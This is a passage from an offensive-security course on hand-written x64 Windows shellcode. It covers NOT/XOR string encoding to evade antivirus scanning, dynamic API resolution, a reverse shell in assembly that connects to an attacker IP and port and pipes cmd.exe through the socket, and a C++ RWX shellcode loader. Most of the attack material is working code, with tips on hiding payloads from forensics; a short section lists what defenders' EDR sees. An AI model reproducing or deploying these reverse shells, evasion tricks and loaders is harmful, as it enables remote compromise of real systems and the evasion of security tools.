Learning Objectives

Encode string literals using the NOT instruction to defeat static AV string scanning
Use the Windows Calculator to pre-compute NOT values without writing a script
Apply XOR encoding as an alternative to NOT for string obfuscation
Understand the limits of single-instruction encoding vs. full encryption

Why Encode Strings in Shellcode?

Static analysis tools (antivirus, YARA rules, EDR file scanning) look for recognizable strings like WinExec, calc.exe, cmd.exe, and Windows API names in binary files. If your shellcode contains these as plaintext, a simple string scan will flag it before it ever executes. The NOT instruction gives us a one-instruction decode that adds negligible overhead and keeps these strings out of the file in plaintext.

      NASM x64
      not_encoding.asm — NOT-based string encoding for static analysis evasion
    
; not_encoding.asm — g3tsyst3m Module 4
; Encode strings using NOT instruction — defeats simple string scanning
; Pre-computation: take your target string's hex value and NOT it in the Calculator
; Store the NOT'd value in shellcode → at runtime, NOT it back to the original

; ── Encoding "WinExec" with NOT ──
; "WinExec" as a 7-byte immediate: 0x636578456E6957; with the 0x90 placeholder on top: 0x90636578456E6957
; Apply NOT: ~0x90636578456E6957 = 0x6F9C9A87BA9196A8
; This is what we store — static scanners see 0x6F9C9A87BA9196A8, not "WinExec"

mov rax, 0x6F9C9A87BA9196A8  ; NOT'd "WinExec" (stored in shellcode)
not rax                    ; decode at runtime → RAX = 0x90636578456E6957
shl rax, 0x8               ; shift placeholder out, null into MSB
shr rax, 0x8               ; RAX = "WinExec\0" — ready to push
push rax

; ── Encoding "calc.exe" with NOT ──
; Original: 0x6578652E636C6163 → NOT'd: 0x9A879AD19C939E9C

xor rdx, rdx               ; "calc.exe" fills all 8 bytes, so the terminator
push rdx                   ; needs its own zero qword, pushed first
mov rax, 0x9A879AD19C939E9C  ; NOT'd "calc.exe"
not rax                    ; decode → RAX = "calc.exe"
push rax                   ; push decoded string (already 8 bytes, no shl/shr needed)
mov rcx, rsp               ; RCX = pointer to "calc.exe"

; ── Using Windows Calculator to pre-compute NOT values ──
; 1. Open Calculator → Programmer mode
; 2. Enter your string hex value
; 3. Click NOT → result is your encoded value to embed in shellcode
; 4. To verify: NOT(NOT(x)) = x — double-NOT should give you back the original

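; ── XOR encoding as an alternative ──
; Choose a key byte that never equals a byte of the string (e.g., 0xAA repeated)
mov rax, 0x3AC9CFD2EFC4C3FD  ; 0x90636578456E6957 ("WinExec" + placeholder) XOR 0xAAAAAAAAAAAAAAAA
mov r10, 0xAAAAAAAAAAAAAAAA  ; xor has no 64-bit immediate form, so the key goes in a register
xor rax, r10               ; XOR with the same key → 0x90636578456E6957, then shl/shr as above
; A string byte equal to the key byte encodes to 0x00, so check the encoded value for nulls.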

You don't need a script to compute NOT-encoded string values. Windows Calculator in Programmer mode handles this directly:
- Open Calculator → switch to Programmer mode from the menu (the keyboard shortcut differs between Calculator versions)
- Set the word size to QWORD (64-bit)
- Enter your string's hex value (e.g., 90636578456E6957 for "WinExec" with 0x90 placeholder)
- Click the NOT button — the result is your encoded value
- Verify: paste the result back in, click NOT again — you should get your original value
💡 This is the workflow used for every encoded string in the course. No Python, no script — just the calculator. Fast and reliable for pre-computing a handful of strings.

For larger string sets or automated workflows, a one-liner works: python3 -c "x=0x90636578456E6957; print(hex(~x & 0xFFFFFFFFFFFFFFFF))"
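
The one-liner generalizes to a small helper that builds the placeholder-padded value and confirms the round trip. This is a sketch under assumptions: not_encode and has_null_byte are hypothetical names, input is ASCII of at most 8 characters, and a string padded with k placeholder bytes needs shl/shr by 8*k at runtime rather than the fixed 8 used for "WinExec".

```python
MASK64 = (1 << 64) - 1


def not_encode(text, placeholder=0x90):
    """Pad an ASCII string to 8 bytes with a placeholder, read it as a
    little-endian 64-bit value, and return the bitwise NOT of that value."""
    data = text.encode("ascii")
    if len(data) > 8:
        raise ValueError("string does not fit in one 64-bit register")
    padded = data + bytes([placeholder]) * (8 - len(data))
    return ~int.from_bytes(padded, "little") & MASK64


def has_null_byte(value):
    """True if any of the 8 bytes of a 64-bit immediate is 0x00."""
    return 0 in value.to_bytes(8, "little")


if __name__ == "__main__":
    for name in ("WinExec", "calc.exe"):
        encoded = not_encode(name)
        decoded = ~encoded & MASK64
        print(name, hex(encoded), hex(decoded), has_null_byte(encoded))
```

A NOT-encoded byte is zero only when the original byte is 0xFF, so ASCII strings with a 0x90 placeholder never produce a null in the stored immediate.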

NOT encoding defeats static string scanning, meaning AV/EDR tools that look for plaintext strings in binary files. It does not defeat:
- Behavioral detection — the shellcode still calls the same APIs in the same order
- Dynamic analysis / sandboxing — the strings are decoded at runtime and visible in memory
- Memory scanning — after decoding, the strings exist in process memory
- YARA rules targeting the NOT-encoded values themselves (if the rule is updated)
For stronger evasion, the next layer is XOR-based payload encryption (encrypting the entire shellcode blob, not just individual strings) with runtime decryption. That topic is covered in advanced EDR evasion content beyond this 101 course.

⚠ Don't mistake string encoding for security. It's a static analysis speed bump, not a comprehensive evasion strategy. Modern EDR products with behavioral analysis will still catch shellcode that calls VirtualAlloc + memcpy + function pointer in sequence.

Module Five

Dynamic API Resolution with GetProcAddress

// Popping a MessageBox the hard way — and why it matters

Learning Objectives

Use GetProcAddress and LoadLibraryA to load user32.dll and resolve MessageBoxA
Manage the 4-parameter calling convention for MessageBoxA in x64 assembly
Locate ExitProcess to cleanly terminate shellcode without crashing
Build a reusable API resolution stub for use in more complex shellcode

Beyond kernel32 — Loading Additional DLLs

Our PE-walking technique from Module 2 locates functions in kernel32.dll. But shellcode often needs APIs from other DLLs — user32.dll for UI functions, ws2_32.dll for sockets, ntdll.dll for native APIs. The solution: use GetProcAddress and LoadLibraryA (both in kernel32) to dynamically load any DLL and resolve any function at runtime. This is the API resolution pattern used in the reverse shell in Modules 6 and 7.

      NASM x64
      getprocaddress.asm — dynamic API resolution and MessageBoxA pop
    
; getprocaddress.asm — g3tsyst3m Module 5
; Resolve GetProcAddress via PE walk, then use it to load user32.dll and MessageBoxA
; Prerequisite: PE walk from Module 2 completed; kernel32 base copied from R8
; into R12, because R8 is volatile and will not survive the API calls below

; ── Locate GetProcAddress ── (using same PE walk, searching for "GetProcAddress")
; Result stored in R13 (non-volatile)

; ── Locate LoadLibraryA ──
; Result stored in R15 (non-volatile)

; ── Locate ExitProcess ──
mov rcx, r12               ; RCX = kernel32 base, used as the module handle (1st param)

; Push "ExitProcess" string NULL-free:
mov eax, 0x90737365         ; "ess" + 0x90 placeholder (32-bit write zero-extends RAX)
shl eax, 0x8               ; 0x73736500: placeholder shifted out
shr eax, 0x8               ; 0x00737365: "ess\0"
push rax                   ; push "ess\0"
mov rax, 0x636F725074697845  ; "ExitProc" (little-endian)
push rax                   ; push "ExitProc"
mov rdx, rsp               ; RDX = pointer to "ExitProcess" string
sub rsp, 0x30
call r13                   ; GetProcAddress(kernel32, "ExitProcess")
add rsp, 0x30
mov r14, rax               ; R14 = ExitProcess address

; ── Load user32.dll ──
xor eax, eax               ; RAX = 0
mov ax, 0x6C6C             ; "ll": the upper bytes stay zero and terminate the string
push rax                   ; push "ll\0"
mov rax, 0x642E323372657375  ; "user32.d" little-endian
push rax
mov rcx, rsp               ; RCX = "user32.dll"
sub rsp, 0x30
call r15                   ; LoadLibraryA("user32.dll")
add rsp, 0x30
mov rdi, rax               ; RDI = user32.dll base address

; ── Resolve MessageBoxA from user32.dll ──
mov rcx, rdi               ; RCX = user32.dll handle
mov eax, 0x9041786F         ; "oxA" + 0x90 placeholder
shl eax, 0x8               ; 0x41786F00: placeholder shifted out
shr eax, 0x8               ; 0x0041786F: "oxA\0"
push rax
mov rax, 0x426567617373654D  ; "MessageB" little-endian
push rax
mov rdx, rsp               ; RDX = "MessageBoxA"
sub rsp, 0x30
call r13                   ; GetProcAddress(user32, "MessageBoxA")
add rsp, 0x30
mov r15, rax               ; R15 = MessageBoxA address (LoadLibraryA is no longer needed)

; ── Call MessageBoxA(NULL, "g3tsyst3m", "g3tsyst3m", MB_OK) ──
xor ecx, ecx               ; RCX = NULL (no owner window)
xor eax, eax
mov al, 0x6D               ; "m", the final char of "g3tsyst3m"; upper bytes are the terminator
push rax
mov rax, 0x3374737973743367  ; "g3tsyst3" in little-endian
push rax
mov rdx, rsp               ; RDX = lpText = "g3tsyst3m"
mov r8, rsp                ; R8  = lpCaption = same string
xor r9d, r9d               ; R9  = uType = MB_OK (0)
sub rsp, 0x30
call r15                   ; MessageBoxA pops the g3tsyst3m box
add rsp, 0x30

With multiple API calls in flight, register management becomes critical. The strategy used throughout this course:
- R12 — kernel32.dll base address (set once, never overwritten)
- R13 — GetProcAddress function address
- R14 — ExitProcess / current secondary API being used
- R15 — primary call target (the API we're about to call)
- RDI — secondary DLL base (user32, ws2_32, etc.)
Before each API call, check that you haven't accidentally clobbered a non-volatile register. x64dbg's register panel makes this obvious — values that changed after a CALL in the non-volatile registers signal a bug in your convention usage (or the called API is non-conformant, which is rare but possible).

💡 When debugging, color-code your register assignments in comments: RBX=kernel32, R12=kernel32_base, etc. Shellcode debugging without this discipline is a nightmare.

After your shellcode's payload executes, the instruction pointer needs somewhere to go. Without a clean exit, execution continues into whatever memory follows the shellcode and almost certainly crashes. Always end shellcode with a call to ExitProcess.

ExitProcess takes one parameter: the exit code (typically 0). Since it's in kernel32, we can resolve it via our PE walk or via GetProcAddress. The course resolves it via GetProcAddress after establishing the GetProcAddress function pointer.

⚠ In some shellcode scenarios (injected threads, callback-based execution), calling ExitProcess terminates the entire host process — not just your thread. In those cases, use ExitThread instead. Know your execution context before choosing your exit strategy.

Module Six

Reverse Shell — Using Extern APIs

// Building your first reverse shell the easy way before doing it the hard way

Learning Objectives

Understand the Winsock API chain required for a TCP reverse shell
Use EXTERN declarations to link against ws2_32.lib and kernel32.lib
Populate the STARTUPINFOA structure correctly in x64 assembly
Redirect stdin/stdout/stderr to a socket handle for shell I/O
Compile and link a functional reverse shell executable with MinGW-w64

The Extern Approach — Learning Before the Deep End

A full dynamic reverse shell (Module 7) requires resolving 6+ socket APIs manually via PE walking — that's 500+ lines of assembly and a significant complexity jump. Module 6 uses EXTERN declarations to link against the APIs directly, producing a clean, readable reverse shell that demonstrates the logic without the noise. Think of it as a scaffold: understand the control flow here, then Module 7 removes the training wheels.

      NASM x64
      asmsock_extern.asm — reverse shell using EXTERN API declarations
    
; asmsock_extern.asm — g3tsyst3m Module 6
; Reverse shell via extern APIs — compile+link:
; nasm -f win64 asmsock_extern.asm -o asmsock.obj
; ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32

BITS 64
section .text
global main

; ── Extern declarations — linker resolves these from ws2_32/kernel32 ──
extern WSAStartup
extern WSASocketA
extern WSAConnect
extern CreateProcessA
extern ExitProcess

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0

; ── WSAStartup(0x0202, &wsaData) ──
sub rsp, 0x200             ; allocate space for WSADATA structure (408 bytes)
mov rcx, 0x0202            ; wVersionRequired = 2.2
mov rdx, rsp               ; &wsaData
sub rsp, 0x30
call WSAStartup
add rsp, 0x30

; ── WSASocketA(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6, NULL, 0, 0) ──
xor rcx, rcx
mov cl, 2                  ; AF_INET
xor rdx, rdx
mov dl, 1                  ; SOCK_STREAM
xor r8, r8
mov r8b, 6                 ; IPPROTO_TCP
xor r9, r9                 ; lpProtocolInfo = NULL
; 5th param (0) and 6th param (0) go on stack above shadow space:
xor rax, rax
push rax                   ; dwFlags = 0 (6th param)
push rax                   ; g = 0 (5th param)
sub rsp, 0x20              ; shadow space
call WSASocketA             ; returns socket handle in RAX
add rsp, 0x30              ; restore (shadow + 2 stack params)
mov rdi, rax               ; RDI = socket handle (preserve in non-volatile)

; ── Build SOCKADDR_IN structure on stack ──
; struct { WORD family; WORD port; DWORD addr; BYTE zero[8]; }
xor rax, rax
push rax                   ; sin_zero[8] = 0 (upper 8 bytes of the 16-byte structure)
; The lower QWORD packs sin_family | sin_port | sin_addr from low to high address.
; IP 192.168.1.100: the immediate 0x6401A8C0 lands in memory as C0 A8 01 64 (network order)
mov eax, 0x6401A8C0        ; sin_addr
shl rax, 16
; Port 4444 = 0x115C: the immediate 0x5C11 lands in memory as 11 5C (network order)
mov ax, 0x5C11             ; sin_port = htons(4444)
shl rax, 16
mov ax, 2                  ; sin_family = AF_INET
push rax                   ; RAX = 0x6401A8C05C110002
mov rdx, rsp               ; RDX = &SOCKADDR_IN

; ── WSAConnect(socket, &sockaddr, sizeof(sockaddr), NULL, NULL, NULL, NULL) ──
mov rcx, rdi               ; socket handle
xor r8, r8
mov r8b, 16                ; sizeof(SOCKADDR_IN)
xor r9, r9                 ; lpCallerData = NULL
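; params 5-7 (lpCalleeData, lpSQOS, lpGQOS) are NULL and go on the stack.
; 3 pushes + 0x20 shadow = 0x38, which is not a multiple of 16, so push one padding QWORD first:
xor rax, rax
push rax                   ; alignment padding
push rax                   ; lpGQOS = NULL (7th param)
push rax                   ; lpSQOS = NULL (6th param)
push rax                   ; lpCalleeData = NULL (5th param)
sub rsp, 0x20              ; shadow space
call WSAConnect
add rsp, 0x40              ; restore (shadow + 3 stack params + padding)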

; ── Populate STARTUPINFOA ── (the most painful part of the reverse shell)
; Fields: cb(DWORD), reserved(PTR), desktop(PTR), title(PTR),
;         dwX/Y/XSize/YSize(DWORDs), wShowWindow(WORD), cbReserved2(WORD),
;         lpReserved2(PTR), hStdInput/Output/Error(HANDLE) — redirected to socket!
; We push fields in reverse order (stack grows down)

xor rax, rax
; hStdError, hStdOutput, hStdInput — all set to socket handle
push rdi                   ; hStdError = socket
push rdi                   ; hStdOutput = socket
push rdi                   ; hStdInput = socket
push rax                   ; lpReserved2 = NULL
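; +0x40: wShowWindow = 1 (WORD) | cbReserved2 = 0 (WORD) | 4 bytes of padding
push 1
; +0x38: dwFillAttribute = 0 (low DWORD) | dwFlags = 0x100 STARTF_USESTDHANDLES (high DWORD)
; PUSH has no 64-bit immediate form, so load the QWORD into a scratch register first
mov rcx, 0x0000010000000000
push rcx
; (the full structure is 13 QWORDs = 0x68 bytes, so RSP ends up 8 bytes off 16-byte alignment)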
push rax                   ; dwYCountChars/dwXCountChars
push rax                   ; dwYSize/dwXSize
push rax                   ; dwY/dwX
push rax                   ; lpTitle
push rax                   ; lpDesktop
push rax                   ; lpReserved
mov eax, 0x68              ; cb = sizeof(STARTUPINFOA) = 104 (0x68)
push rax
mov rax, rsp               ; RAX = &STARTUPINFOA

; ── CreateProcessA(NULL, "cmd.exe", ..., &STARTUPINFOA, &PROCESS_INFORMATION) ──
xor rcx, rcx               ; lpApplicationName = NULL
; push "cmd.exe" string and set RDX...
sub rsp, 0x30
call CreateProcessA
add rsp, 0x30

; ── ExitProcess(0) ──
xor rcx, rcx
sub rsp, 0x30
call ExitProcess

⚠ Replace 0x6401A8C0 (192.168.1.100) and 0x5C11 (port 4444) with your actual attacker IP and port in network byte order before testing. Verify your listener is running: nc -lvnp 4444

STARTUPINFOA is notoriously painful in x64 assembly because its fields use mixed sizes (DWORD, WORD, QWORD) and x64 stack alignment requirements mean you can't just push them naively. The key fields for a reverse shell:
- cb (DWORD, +0x00) = 0x68 (104 bytes, the size of the structure); 4 bytes of padding follow so lpReserved lands at +0x08
- dwFlags (DWORD, +0x3C) = STARTF_USESTDHANDLES (0x100), which tells CreateProcess to use hStdInput/Output/Error
- wShowWindow (WORD, +0x40) = 1 (SW_SHOWNORMAL) or 0 (SW_HIDE); only honored when dwFlags also includes STARTF_USESHOWWINDOW (0x1)
- hStdInput (HANDLE, +0x50) = socket handle
- hStdOutput (HANDLE, +0x58) = socket handle
- hStdError (HANDLE, +0x60) = socket handle
The 32-bit layout is simpler: pointers and handles are 4 bytes, the structure is 0x44 bytes, and no alignment padding is needed. In x64, the padding after cb and between the WORD fields and the next QWORD-aligned field is where most bugs hide.
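
One way to double-check field offsets without a debugger is to describe the structure with Python's `ctypes` and let it compute the layout. This is a sketch under two assumptions: the interpreter is 64-bit (so `c_void_p` is 8 bytes), and pointer and handle fields are modeled as plain `c_void_p` instead of their real Windows types.

```python
import ctypes

DWORD = ctypes.c_uint32
WORD = ctypes.c_uint16
PTR = ctypes.c_void_p  # stands in for LPSTR, LPBYTE and HANDLE


class STARTUPINFOA(ctypes.Structure):
    # Field order follows the documented STARTUPINFOA declaration.
    _fields_ = [
        ("cb", DWORD),
        ("lpReserved", PTR),
        ("lpDesktop", PTR),
        ("lpTitle", PTR),
        ("dwX", DWORD),
        ("dwY", DWORD),
        ("dwXSize", DWORD),
        ("dwYSize", DWORD),
        ("dwXCountChars", DWORD),
        ("dwYCountChars", DWORD),
        ("dwFillAttribute", DWORD),
        ("dwFlags", DWORD),
        ("wShowWindow", WORD),
        ("cbReserved2", WORD),
        ("lpReserved2", PTR),
        ("hStdInput", PTR),
        ("hStdOutput", PTR),
        ("hStdError", PTR),
    ]


if __name__ == "__main__":
    for name, _ in STARTUPINFOA._fields_:
        print(f"+0x{getattr(STARTUPINFOA, name).offset:02X}  {name}")
    print(f"sizeof = 0x{ctypes.sizeof(STARTUPINFOA):X}")
```

Comparing this printout against the memory dump at RSP in x64dbg makes a misplaced push easy to spot.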

💡 Use x64dbg to inspect the structure after pushing all the fields. Navigate to the RSP address and verify each field offset visually against the MSDN STARTUPINFOA documentation.
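
WSASocketA and WSAConnect both take more than 4 parameters. The first four travel in RCX, RDX, R8 and R9; parameters 5+ go on the stack directly above the 0x20-byte shadow space (the home area for those four registers). Immediately before the CALL they sit at RSP+0x20, RSP+0x28, and so on; inside the callee, once the return address has been pushed, the same slots are at RSP+0x28, RSP+0x30, etc. This is the first instance in this course with more than 4 parameters being passed.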

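The push order is reversed: push the last parameter first, working backward to the 5th. Then allocate shadow space with sub rsp, 0x20 and call. If the number of stack parameters is odd, push one extra padding QWORD before them so RSP is still 16-byte aligned at the call. After the call, restore RSP by adding back (shadow space + pushed parameter bytes + any padding).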

⚠ Getting the RSP math wrong for 5+ parameter functions is the #1 cause of crashes in this module. Count your pushes carefully and verify stack alignment before the call in x64dbg.
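
The RSP arithmetic for calls with stack parameters can be sketched in a few lines of Python. This is an illustration only: `call_frame` is a hypothetical helper, and it assumes RSP is 16-byte aligned before the first push and that every stack parameter occupies one 8-byte slot.

```python
SHADOW_SPACE = 0x20  # home area for RCX, RDX, R8, R9


def call_frame(num_params):
    """Return stack bookkeeping for a Windows x64 call built from pushes + sub rsp, 0x20."""
    stack_params = max(0, num_params - 4)           # parameters 5+ live on the stack
    param_bytes = 8 * stack_params
    # Pad so that shadow space + stack parameters is a multiple of 16.
    pad_bytes = (16 - (SHADOW_SPACE + param_bytes) % 16) % 16
    return {
        "stack_params": stack_params,
        "pad_bytes": pad_bytes,
        "cleanup": SHADOW_SPACE + param_bytes + pad_bytes,  # value for "add rsp, N"
    }


if __name__ == "__main__":
    for name, count in (("WSASocketA", 6), ("WSAConnect", 7), ("CreateProcessA", 10)):
        frame = call_frame(count)
        print(f"{name}: {frame['stack_params']} stack params, "
              f"pad {frame['pad_bytes']} bytes, add rsp, 0x{frame['cleanup']:X}")
```

An odd number of stack parameters (WSAConnect has three) is the case that needs the extra 8 bytes.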

TCP socket structures use big-endian (network) byte order for IP addresses and ports. Since x64 is little-endian, you need to byte-swap before embedding the values in your shellcode.

Port 4444 conversion: 4444 decimal = 0x115C hex → big-endian bytes = 0x11 0x5C → as a WORD in little-endian storage = 0x5C11

IP 192.168.1.100 conversion: bytes are 0xC0 0xA8 0x01 0x64 → as a DWORD in little-endian storage = 0x6401A8C0

💡 Python: import socket; print(hex(socket.htonl(0xC0A80164))) — htonl handles the byte swap for you. For ports: hex(socket.htons(4444))
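
Because `socket.htonl` and `socket.htons` depend on the byte order of the machine running the script, a variant built on `struct` gives the same answer everywhere. A minimal sketch follows; `sockaddr_immediates` is a hypothetical helper name, and the IP and port are the example values used in this module.

```python
import socket
import struct


def sockaddr_immediates(ip, port):
    """Return (ip_dword, port_word) as immediates for a little-endian CPU.

    Stored to memory by a little-endian store, each value produces the
    big-endian (network order) byte sequence that SOCKADDR_IN expects.
    """
    ip_dword = struct.unpack("<I", socket.inet_aton(ip))[0]
    port_word = struct.unpack("<H", struct.pack(">H", port))[0]
    return ip_dword, port_word


if __name__ == "__main__":
    ip_dword, port_word = sockaddr_immediates("192.168.1.100", 4444)
    print(f"IP immediate:   0x{ip_dword:08X}")
    print(f"Port immediate: 0x{port_word:04X}")
```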

Module Seven

Pure x64 Assembly Reverse Shell

// No externs. No training wheels. 500+ lines of pure assembly.

Learning Objectives

Dynamically resolve all Winsock APIs (WSAStartup, WSASocketA, WSAConnect) via PE walking
Load ws2_32.dll at runtime using LoadLibraryA resolved from kernel32
Build a complete NULL-free reverse shell in pure position-independent x64 assembly
Understand why this is the "final exam" of x64 shellcode development

The Final Exam

This module is the culmination of everything in the course. No externs, no shortcuts — every API is resolved at runtime using the techniques from Modules 2–5. All strings are NULL-free using the techniques from Modules 3–4. The result is position-independent shellcode that can be extracted as raw bytes and executed in any context.

The code is long — 500+ lines — but if you've worked through the previous modules it's not magic. It's the same patterns repeated: PEB walk, PE export walk, string push, API call. The only new complexity is ws2_32.dll (which must be loaded via LoadLibraryA since it's not pre-loaded in most processes) and the full STARTUPINFOA structure population without any extern help.

ℹ The complete source for this module is available as a downloadable NASM file in the course materials. The code walkthrough below highlights the key structural sections. Full inline comments explain every instruction.

      NASM x64
      revshell_pure.asm — structural overview of pure dynamic reverse shell
    
; revshell_pure.asm — g3tsyst3m Module 7
; Pure x64 assembly reverse shell — no externs, fully dynamic API resolution
; Full source: see course download. This shows the top-level structure.
;
; === SECTION 1: Prologue + PEB Walk → kernel32 base ===
BITS 64
section .text
global main

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0
; PEB → InMemoryOrderModuleList → kernel32 base → R8
mov rax, [gs:0x60]
mov rax, [rax+0x18]
mov rax, [rax+0x20]
mov rax, [rax]
mov rax, [rax]
mov r8,  [rax+0x20]         ; R8 = kernel32 base

; === SECTION 2: Resolve GetProcAddress + LoadLibraryA from kernel32 ===
; (full PE export table walk — same as Module 2, targeting "GetProcAddress" and "LoadLibraryA")
; Result: R13 = GetProcAddress, R15 = LoadLibraryA

; === SECTION 3: Load ws2_32.dll ===
; Push "ws2_32.dll" NULL-free, call LoadLibraryA
xor rax, rax
mov ax, 0x6C6C             ; "ll"; the zeroed upper bytes of RAX supply the NULL terminator
push rax
mov rax, 0x642E32335F327377  ; "ws2_32.d" in little-endian
push rax
mov rcx, rsp
sub rsp, 0x30
call r15                   ; LoadLibraryA("ws2_32.dll")
add rsp, 0x30
mov rdi, rax               ; RDI = ws2_32.dll base

; === SECTION 4: Resolve WSAStartup, WSASocketA, WSAConnect from ws2_32 ===
; For each: push NULL-free encoded name, call GetProcAddress(rdi, name)
; Store results in non-volatile registers / push to stack for later

; === SECTION 5: Resolve CreateProcessA + ExitProcess from kernel32 ===

; === SECTION 6: WSAStartup → WSASocketA → WSAConnect ===
; Identical logic to Module 6 but calling dynamically resolved addresses

; === SECTION 7: STARTUPINFOA population + CreateProcessA ===
; Identical structure to Module 6 — hStdInput/Output/Error = socket

; === SECTION 8: ExitProcess(0) ===
xor rcx, rcx
sub rsp, 0x30
call r14                   ; ExitProcess(0)

Every Windows process has kernel32.dll and ntdll.dll pre-loaded in its address space — that's why we can find kernel32 via the PEB's InMemoryOrderModuleList without calling LoadLibrary first. But ws2_32.dll (Winsock) is not loaded by default in most processes. It must be explicitly loaded before its functions can be resolved.

The implication for shellcode: you need LoadLibraryA from kernel32 before you can get WSAStartup from ws2_32. This creates a dependency order: PEB walk → kernel32 base → LoadLibraryA + GetProcAddress → LoadLibraryA("ws2_32.dll") → GetProcAddress(ws2_32, "WSAStartup") etc.

💡 If your target process is a web server, database, or any network-aware application, ws2_32 is probably already loaded. You could skip LoadLibraryA and walk the PEB for it directly — but using LoadLibraryA is safer and works in all cases.
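
With this many API calls in play, disciplined register allocation is essential. The strategy used in the full course source:
- R8 — kernel32.dll base (set once in the PEB walk). R8 is volatile and doubles as the 3rd parameter register, so the value must be copied to a non-volatile register or the stack before the first API call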
- R13 — GetProcAddress (preserved after initial resolution)
- R15 — LoadLibraryA / current call target (repurposed as needed)
- RDI — ws2_32.dll base after LoadLibraryA call
- R12 — socket handle (set after WSASocketA, preserved through CreateProcess)
- R14 — ExitProcess / secondary resolved API
API addresses that are used only once are called immediately after resolution without storing in a non-volatile register — the volatile RAX return value is used directly. Only APIs called more than once (GetProcAddress, LoadLibraryA, ExitProcess) get permanent register homes.

After verifying the assembly compiles and runs correctly as an EXE, extract the raw shellcode bytes for use in a loader:
- nasm -f bin revshell_pure.asm -o revshell.bin — if using raw binary output (no PE wrapper)
- Or: compile to obj, then extract the .text section: objcopy -O binary -j .text revshell.obj revshell.bin
- Verify: python3 -c "d=open('revshell.bin','rb').read(); assert b'\\x00' not in d, 'NULLS FOUND'; print(f'CLEAN — {len(d)} bytes')"
- Format as C array: python3 -c "d=open('revshell.bin','rb').read(); print('unsigned char sc[] = {' + ','.join(hex(b) for b in d) + '};')"
💡 The course's final shellcode runs approximately 500-600 bytes. Future optimization using tighter function lookup loops can reduce this significantly — a topic for an advanced follow-on course.
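
The two verification one-liners above can also be written as a small reusable script that reports where any NULL bytes are. The following is a sketch and not the course's tooling: `null_offsets` and `to_c_array` are hypothetical names, and the sample bytes are only a placeholder.

```python
def null_offsets(data):
    """Return the offsets of every 0x00 byte in the extracted shellcode."""
    return [i for i, b in enumerate(data) if b == 0]


def to_c_array(data, name="sc", per_line=12):
    """Format raw bytes as a C unsigned char array, per_line bytes per row."""
    rows = []
    for i in range(0, len(data), per_line):
        rows.append("    " + ", ".join(f"0x{b:02x}" for b in data[i:i + per_line]))
    return f"unsigned char {name}[] = {{\n" + ",\n".join(rows) + "\n};"


if __name__ == "__main__":
    sample = bytes.fromhex("4883ec284883e4f0")  # placeholder; read revshell.bin in practice
    bad = null_offsets(sample)
    print("CLEAN" if not bad else f"NULL bytes at offsets {bad}")
    print(to_c_array(sample))
```

Knowing the offsets, not just that a NULL exists, points you at the instruction that needs re-encoding.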

Module Eight

Shellcode Execution & C++ Loaders

// Getting your shellcode off the disk and into memory

Learning Objectives

Build a C++ shellcode loader using VirtualAlloc + memcpy + function pointer
Understand PAGE_EXECUTE_READWRITE vs. safer VirtualProtect patterns
Embed shellcode as a C array and as a file-read from disk
Understand why the loader itself is the primary detection surface for modern EDR

The Standard Shellcode Loader

A shellcode loader's job is simple: get the shellcode bytes into executable memory and transfer control to them. The standard approach — VirtualAlloc with PAGE_EXECUTE_READWRITE, memcpy, then cast and call — is functional but heavily signatured by modern EDR. This module teaches the baseline that everything else builds on.

      C++
      loader.cpp — standard shellcode execution harness
    
// loader.cpp — g3tsyst3m Module 8
// Standard shellcode execution harness
// Build: cl.exe loader.cpp /link /out:loader.exe

#include <windows.h>
#include <cstring>   // memcpy
#include <iostream>

// Paste your extracted shellcode bytes here:
unsigned char shellcode[] =
    "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9"
    "\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b"
    /* ... full shellcode bytes ... */;

int main() {
    // Allocate RWX memory
    void* exec_mem = VirtualAlloc(
        nullptr,
        sizeof(shellcode),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!exec_mem) {
        std::cerr << "[-] VirtualAlloc failed: " << GetLastError() << "\n";
        return 1;
    }
    std::cout << "[+] Allocated " << sizeof(shellcode)
              << " bytes at 0x" << exec_mem << "\n";

    // Copy shellcode into executable region
    memcpy(exec_mem, shellcode, sizeof(shellcode));

    // Cast to function pointer and execute
    auto sc_func = (void(*)())exec_mem;
    std::cout << "[+] Executing shellcode...\n";
    sc_func();

    // Should not reach here if shellcode calls ExitProcess
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}

Allocating memory as PAGE_EXECUTE_READWRITE (RWX) in one call is the most detectable loader pattern — EDR products specifically watch for VirtualAlloc with RWX permissions followed by a write and execution. A less obvious pattern uses two-step memory management:
- Allocate with PAGE_READWRITE (not executable)
- Write shellcode into the allocation
- Call VirtualProtect to change to PAGE_EXECUTE_READ
- Execute — memory is never simultaneously writable and executable
This pattern looks less suspicious to EDR and is closer to how legitimate JIT compilers work. It doesn't eliminate detection, but it raises the bar for behavioral analysis.

⚠ Neither pattern defeats modern behavioral EDR. The real evasion work happens at the loader level — process injection, stomping, indirect syscalls — topics covered in advanced EDR bypass content beyond this course.

Embedding shellcode as a hardcoded C array is simple, but it means the loader binary itself contains the shellcode, so file-scanning AV will find it. An alternative is to read shellcode from a file at runtime:
- Store shellcode in an external file (optionally encrypted)
- Open with CreateFileA + ReadFile at runtime
- Decrypt if necessary, then VirtualAlloc + execute
This separates the loader from the payload — the loader binary is clean, and the shellcode file can be fetched from a remote URL, read from an alternate data stream, or stored in the registry to further complicate forensic recovery.

💡 For lab use, embedding as a C array is fine. For red team engagements, always separate loader from payload and consider encrypting the payload at rest.

Modern EDR products don't just scan for shellcode signatures; they monitor the behavioral sequence of API calls that loaders make. The VirtualAlloc → WriteProcessMemory/memcpy → VirtualProtect → CreateThread/CallFunction sequence is so well-known that it has dedicated behavioral detection rules in virtually every enterprise EDR product.

The shellcode itself being NULL-free and string-encoded matters primarily for static file scanning. Once you're in memory and executing, the EDR's eyes are on the loader's API call sequence, not the shellcode bytes.

Key detection telemetry a SOC analyst sees from a standard shellcode loader:
- ETW events for VirtualAlloc with executable permissions
- Sysmon Event 8 (CreateRemoteThread) if injection is used
- Network connections from the shellcode's reverse shell (Sysmon Event 3)
- cmd.exe spawned with unusual parent process (Sysmon Event 1)
⚠ This is why understanding the defender's perspective matters — knowing what EDR sees from your loader is as important as knowing how the shellcode works. The next course in this series covers advanced loader techniques and EDR evasion.

